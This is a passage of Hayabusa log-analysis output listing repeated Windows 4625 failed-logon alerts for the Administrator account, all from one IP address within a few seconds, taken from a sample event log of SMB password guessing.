NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.250 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9B8Gq7d30U8DqdN0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yxSPuxpCHgSo1d1a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9elGZ4POExblUCAK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XHY9Ig3sqQKNXYqq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: voMDzTqYqKpfudKo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m8m9SJ1aFpvFqClU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dM84lQYVfHhZmgpK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O5FrdBbYXWaqFkeb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZxiNMjsd3YfoCNa2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v1u5uD9SiDFq9VOD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.675 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pZv9l3b7U8tIVmw8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.716 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7EfPqiBhm6hRX700 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.763 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3uvqgri2KGIDAlg1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oLXZMXKsjOaurgZV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nXtiRWHDJqpq69Ej : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.915 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OeC1T9YkT1hXMcGG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YPf6nlwAeuu7cf00 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4fvVUozD2RuIchN4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KP3rghcrgas3l3q1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MMtcQYoVoM57gTcj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.137 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IFjTWECEep09Abjt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.177 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jUlguy8tKBo4DSUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GETwMERLpiVtMRkw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bhas9Vjc193EVcOg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OmVAnxq39t7qbcEs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 13y2nnltjipwZqth : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wDQrPBL1VodIcQLR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K0Mp4jXeHd3b0CLw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.472 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3j89GmIDnG4v7JJC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.512 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xyRLZMoaXJUrPPfn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.607 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZcoyOKUjEi1uCSpD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jWQGVJLcVwgf4YJ8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mrFqG85mmjTYJ4A9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6DqIh1QHTk470nrU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: feVbA94p6iT2pBeC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T30YHcE8ZG7FaxW7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.847 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RaKHRwYtx2lGtOCG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zDEDuMmlDZZfdkFD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CObqGJQi1hOOI83J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.002 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhsE9bQeEwW21bAj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.050 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: El1qxgjvGS0QSS4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.097 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vtlr3HwzJcAfSxuO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.141 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KDayr44iXmE63vqd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FkNoLVOhnS8ayujK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3ggg78jjziKqijrT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BodeSVqeqa5qBQDL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.362 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yY7yxEcuGwWSJZV2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.406 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oTlg6cvsz6Z6QpCp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3pTALzqu4Ok6CUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.509 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kdGagQIEcvQQMp4n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fVu4reOyQEIkChHO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.609 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EJWNS69MmMGLSnHc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nPaR2sBxPPCjxpL0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kJJ9A1EfqM4V2TRv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4dxf59xjpxO3oG17 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o6dMI12g4tjSF8PX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZAqN0xPaW4jg2Kjc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mcnReyIEaqsQfowV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: akOH8Y7XdjOpqTez : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.967 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b0HOK1TIqloud7gh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n6uIAK55BmTnA6Bf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZDnn6QmLOJ6KwzKt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: np8KaRJvRqBrGyFL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dxbu69Amr6gWN5Hw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LoZdaFJWNON8Ujnc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q4RSlXgOS7sssCqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j2PJprE7olK4pjrx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jQOAUcWQL32y2gGe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nXI0wWwzhHN0uvOP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.414 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ujGqTzfOhmKgoAjt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cFoPtWZ03O3ZZgOC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EyO2VTnpGZLeSIvr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ua69MEWABQ9hsooT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ubPQWn4nQYr3rXr8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xrgATdNqkA44nKqf : IP Address: 192.168.198.149 : AuthPackage: 